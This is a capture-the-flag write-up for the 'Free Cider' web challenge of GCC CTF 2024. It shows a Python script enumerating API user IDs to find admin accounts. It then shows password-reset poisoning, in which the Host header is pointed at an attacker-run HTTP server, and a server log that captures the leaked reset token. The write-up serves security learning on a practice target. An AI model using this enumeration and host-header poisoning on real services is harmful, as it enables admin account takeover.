Post

GCC CTF 2024

Posted Updated
By TFA 2 min read

Author: Anackin, Talace

WEB : Free Cider

In the app’s source code we can see a message for admins :

note

So it would seem that there is a swagger that referres the endpoints of an api and it is still up, before let’s analyse the web app so we can login with user password and we can reset password using only user.

login

reset

Using burpsuite I intercept the http request and we can find an api endpoint.

endpoint

To acces the api swager go to /api/v1/swagger.json.

swagger

The most interresting endpoint is the GET, to find users using an ID.

userid

The admin parameter is set to false, maybe we need to find all admin account for that I quickly created a python script to fuzz the admin account :

1
2
3
4
5
6

import requests 

for i in range(50): 
        url=f"""http://worker05.gcc-ctf.com:12283/api/v1/user/{i}"""
        r = requests.get(url)
        print(r.text)

Run the script using bash command like this :

1
2
3
4

> python fuzz.py > admin.txt && cat admin.txt | grep 'admin":true'
{"admin":true,"id":9,"username":"monique_petersen12"}
{"admin":true,"id":24,"username":"zachary_rodriguez35"}
{"admin":true,"id":31,"username":"vicki_savage190"}

after that I try to find mass assignement vulnerability, but I didn’t found suspicious http requests like PUT on any api endpoints.

I also try to put other parametres on api endpoint request but that didn’t work.

I think we need to abuse the endpoint /api/v1/reset-password to reset admin password.

And yeah I saw right, we can do a reset password poisoning, for that launch a request to the endpoint /api/v1/reset-password

On the http request change the Host header to a server you have under control like this :

request-reset

Ps* don’t forget to start an http server, in my case I used a VPS !

1

python3 -m http.server 80

Launch the request and see the leaked token send by the target server to reset the admin’s account password

1
2

172.234.63.85 - - [02/Mar/2024 17:43:52] code 404, message File not found
172.234.63.85 - - [02/Mar/2024 17:43:52] "GET /reset?token=12cb3489-0ff1-4680-9a17-b5ffc16d73e5 HTTP/1.1" 404 -

Go to your browser and use the token to gain access on the reset page.

token

Use this password and the admin’s account affiliated to log in the app and get the Flag GG ! 😼

Thanks to Mika to this API challs ! we learn a lot.

writeup, CTF
CTF Web
This post is licensed under CC BY 4.0 by the author.